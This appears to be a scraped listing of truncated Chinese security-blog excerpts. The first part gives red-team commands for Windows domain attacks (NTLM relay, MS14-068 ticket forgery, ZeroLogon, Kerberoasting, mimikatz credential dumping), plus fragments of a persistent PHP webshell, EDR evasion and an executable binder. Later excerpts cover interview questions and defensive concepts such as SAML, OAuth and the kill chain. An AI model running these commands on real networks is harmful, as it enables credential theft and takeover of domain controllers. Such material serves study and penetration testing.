CVE-2019-1040创建机器主机账号python3 addcomputer.py -method SAMR -dc-ip 192.168.145.128 -computer-name coleak2 -computer-pass pass@123 "redteam.club/hack:pass@123"中继&委派执行ntlmrelayx.py脚本进行NTLM中继,设置SMB服务器并将
MS14-068第一步:利用MS14-068伪造生成TGTMS14-068.exe -u test@coleak.com -p 123456 -s S-1-5-21-2801122135-3886333168- 273474972-1103 -d dc.coleak.com第二步:利用mimikatz将工具得到的TGT票据写入内存,创建缓存证书mimikatz kerberos::ptc TGT
CVE-2020-1472-ZeroLogon复现检测是否存在 zerologin python3 zerologon_tester.py ad01 192.168.145.134Performing authentication attempts...Success! DC can be fully compromised by a Zerologon attack.置空DC的密码python3
Kerberoasting穷举请求指定的TGS,完成之后klist就能查看相应的票据Add-Type -AssemblyName System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mysql/12server4.redteam.club:
SPN口令爆破SPN为服务主体名称,是服务实列(MSSQL,HTTP等)的唯一标识,如果安装了服务的多个实列,每个实列都有自己的SPN,如果kerberos服务票证的加密类型为RC4_HMAC_MD5,就可以导出TGS对其进行离线爆破,有可能获取到域用户的密码了。在以下或者klist查看加密类型查询域内所有的SPN和查询test域的SPNsetspn.exe -q */* setspn.exe -
高权限读取本地密码当域管理员在域成员机器上登录进行工作的时候,会将明文密码保存在本地进行的lsass.exe进程中,可以通过mimikatz来读取到本地的明文密码。privilege::debug # 提权 sekurlsa::logonpasswords mimikatz "privilege::debug" "sekurlsa::logonpasswords" "exit" >log
不死马权限维持<?php ignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行. set_time_limit(0);//通过set_time_limit(0)可以让程序无限制的执行下去 $interval = 5; // 每隔*秒运行 do { $filename = 'test.php'; if(file_exists($filename)) { echo"
触发EDR远程线程扫描关键api:createprocess、createremotethread、void(指针)、createthread为了更加opsec,尽量采取别的方式执行恶意代码,下面简单给出一些思路进程断链#include <windows.h> #include<iostream> void SimulateKeyPress(WORD keyCode) {
项目在github已开源,获取地址:https://github.com/coleak2021/dirpro1.简介dirpro 是一款由 python 编写的目录扫描器,操作简单,功能强大,高度自动化自动根据返回状态码和返回长度,对扫描结果进行二次整理和判断,准确性非常高已实现功能可自定义扫描线程每扫描10%自动显示扫描进度可自定义扫描字典文件可自定义代理流量自动使用随机的User-Agent自
Traitor 打包了一系列方法来利用本地错误配置和漏洞来弹出 root shell:几乎所有GTFOBins可写 docker.sockCVE-2022-0847(脏管道)CVE-2021-4034(pwnkit)CVE-2021-3560它将利用 GTFOBins 中列出的大多数 sudo 权限来弹出 root shell,以及利用可写docker.sock或最近的脏管道 (CVE-2022-
原理将exe和pdf或者其他格式的文件写到资源节中,执行捆绑文件的时候动态获取并解密资源节的内容保存到磁盘的tmp目录,最后执行保存到磁盘的文件即可代码汇总加密文件#include<windows.h> #include <iostream> using namespace std; int main(int argc, char* argv[]) { in
介绍工作内容讲讲无线两个转发模式特性和应用场景工作地点意愿暂时想到这几个
1.OSPF邻居建立的影响因素2.DR、BDR在区域里担任的角色3DHCP中继不同网段客户如何发现服务器4.上网浏览小米页面,涉及到二层三层上层建立什么关系5.AP胖瘦模式和应用场景6.简历相关项目经历
1.BGP的AS-PATH属性、RR和联盟相关讲讲2.防火墙HA特性和原理3.二层trunk、access、hybrid标签的封装4.简历中项目展开讲讲
确认感染文件特征及感染时间: (1) 操作系统桌面是否有新的文本文件,文本文件中是否有详细的加密信息 及解密联系方式; (2) 被加密的文件类型: .der, .pfx, .key, .crt, .csr, .p12, .pem, .odt, .ott, .sxw, .stw, .uot, .3ds, .max, .3dm, .ods,
是一种特殊编程的路由器,安装在一个网点和网络的其余部分之间。目前是实施访问控制策略。这个访问控制策略是由使用防火墙的单位自行制定的。防火墙的功能有两个,一个是阻止,一个是允许。阻止是阻止某种类型的流量通过防火墙(从外部网络到内部网络)。防火墙技术有两类:①网络级防火墙用来防止整个网络出现外来非法的入侵。属于这类的有分组过滤和授权服务器。前者检查所有流入本网络的信息,后者拒绝不符合事先制定好的一套准
是隐匿而持久的电脑入侵过程,通常由某些人员 精心策划,针对特定的目标。大多是出于商业或政治动机,针对特定组织或国家,并要求在 长时间内保持高隐蔽性。 APT 包含三个要素:高级、长期、威胁。高级强调的是使用复杂精密的恶意软件及技术以利用系统中的漏洞。长期暗指某个外部力量会持续监控特定目标,并从其获取数据。威胁则指人为参与策划的测试。高级体现在两方面:技术层面零日漏洞渠道加密投入层面
• Sysmon • LastActivityView • Regshot • teler Real-time HTTP Intrusion Detection
(1)明文∶加密前的原始数据。( 2)密文∶加密后的数据(用于传输或存储)。( 3)密码: 将明文和密文进行相互转换的算法(密码的含义在这里是一种 1 接的网络(外国 的方法, 加密算法一般对生产厂家是开放的)。( 4)密钥:在密码中使用且仅仅只有收发双方知道的用于加密和解密的信息。
TCPDump 是一款数据包的抓取分析工具,可以将网络中传送的数据包的完全截获下来提供分析。它支持针 对网络层、协议、主机、网络或端口的过滤,并提供逻辑语句来过滤包。 命令行常用选项 • -B <buffer_size> 抓取流量的缓冲区大小,若过小则可能丢包,单位为 KB • -c <count> 抓取 n 个包后退出 • -C <file_size> 当前记
SCRAM (Salted Challenge Response Authentication Mechanism) 是一套包含服务器和客户端双向确认的用户认证机制。
简介 SAML (Security Assertion Markup Language) 译为安全断言标记语言,是一种 xXML 格式的语言,使用XML 格式交互,来完成 SSO 的功能。SAML 存在 1.1 和 2.0 两个版本,这两个版本不兼容,不过在逻辑概念或者对象结构上大致相当,只是在一些细节上有所差异。 认证过程 SAML 的认证涉及到三个角色,分别为服务提供者 (SP)、认证服务
等保包括五个阶段:1、定级、2、备案、3、建设整改、4、等级测评、5、监督检查。定级对象(即需要过等保的对象)建设整改后,需要选择符合国家要求的测评机构,按《网络安全等级保护基本要求》等技术标准进行等级测评,之后向监管单位提交测评报告。
XML是 The Extensible Markup Language (可扩展标识语言)的简写。XML最初设计的目的是弥补 HTML的不足,后来逐渐用于网络数据的转换和描述。XML 的设计宗旨是传输和存储数据,而非显示数据。目前,各种应用程序之间数据传输最常用的工具是XML和JSON。xml例子:<sites> <site> <name>
简介 OAuth 是一个关于授权(authorization)的开放网络标准,在全世界得到广泛应用,目前的版本是 2.0 版。 OAuth 在客户端与服务端之间,设置了一个授权层(authorization layer)。客户端不能直接登录服务端,只能登录授权层,以此将用户与客户端区分开来。客户端登录授权层所用的令牌(token),与用户的密码不同。 用户可以在登录的时候,指定授权层令牌的权限范围
简介 Json web token (JWT), 是为了在网络应用环境间传递声明而执行的一种基于 JSON 的开放标准((RFC7519). 该 token 被设计为紧凑且安全的,特别适用于分布式站点的单点登录(SSO)场景。JWT 的声明一般被用来在身份提供者和服务提供者间传递被认证的用户身份信息,以便于从资源服务器获取资源,也可以增加一些额外的其它业务逻辑所必须的声明信息,该 token 也可
简介 单点登录 (SingleSignOn,SSO) 指一个用户可以通过单一的 ID 和凭证(密码)访问多个相关但彼此独立的系统。 常见流程 1. 用户 (User) 向服务提供商 (Service Provider) 发起请求 2. SP 重定向 User 至 SSO 身份校验服务 (Identity Provider) 3. User 通过 IP 登录4. IP 返回凭证给 User 5.
多因子认证是在单因子认证不足以保证安全性时使用的方法,通常会引入多种方式对用户身份进行验证。身份验证方法可以基于知识的认证,即密码;也可以基于物品的认证,例如硬件密钥;也可以是基于特征的认证,例如包含指纹在内的生物特征等。 具体来说,目前常用的生物特征有:指纹、人脸、虹膜、静脉、声纹、体态等。常用的评价指标主要是速度(注册、识别使用的时间),精确度(假阳性、假阴性)等。
关联分析用于把多个不同的入侵样本结合起来。 文档类 • hash • ssdeep • 版本信息 (公司/作者/最后修改作者/创建时间/最后修改时间) 行为分析 • 基于网络行为 – 类似的交互方式 可执行文件相似性分析 • 特殊端口 • 特殊字符串/密钥 • PDB 文件路径– 相似的文件夹 • 代码复用 – 相似的代码片段
杀伤链 (Kill Kain) 模型 杀伤链这个概念源自军事领域,它是一个描述入侵测试环节的模型。一般杀伤链有认为侦查跟踪 (Reconnais-sance)、武器构建 (Weaponization)、载荷投递 (Delivery)、漏洞利用 (Exploitation)、安装植入 (Installation)、通信控制 (Command&Control)、达成目标 (Actions o
Copyright © 2005-2024 51CTO.COM 版权所有 京ICP证060544号